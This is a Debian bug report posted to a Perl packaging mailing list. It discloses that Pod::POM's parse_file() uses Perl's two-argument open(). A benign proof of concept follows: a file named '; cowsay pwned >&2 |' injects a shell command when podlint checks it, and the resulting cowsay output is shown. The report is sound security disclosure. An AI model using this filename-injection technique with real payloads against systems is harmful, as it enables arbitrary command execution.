Bug#923224: Pod::POM::parse_file() uses 2-argument open()
Jakub Wilk
jwilk at jwilk.net
Mon Feb 25 08:31:49 GMT 2019
Package: libpod-pom-perl
Version: 2.01-2
Tags: security
Control: affects -1 check-all-the-things
The Pod::POM::parse_file function uses 2-argument open().
As a consequence, podlint can't be used securely to check files with
untrusted names.
Proof of concept:
$ touch '; cowsay pwned >&2 |'
$ podlint ./*
sh: 1: ./: Permission denied
_______
< pwned >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
Use of uninitialized value $text in pattern match (m//) at /usr/share/perl5/Pod/POM.pm line 193.
-- System Information:
Architecture: i386
Versions of packages libpod-pom-perl depends on:
ii perl 5.28.1-4
--
Jakub Wilk
More information about the pkg-perl-maintainers
mailing list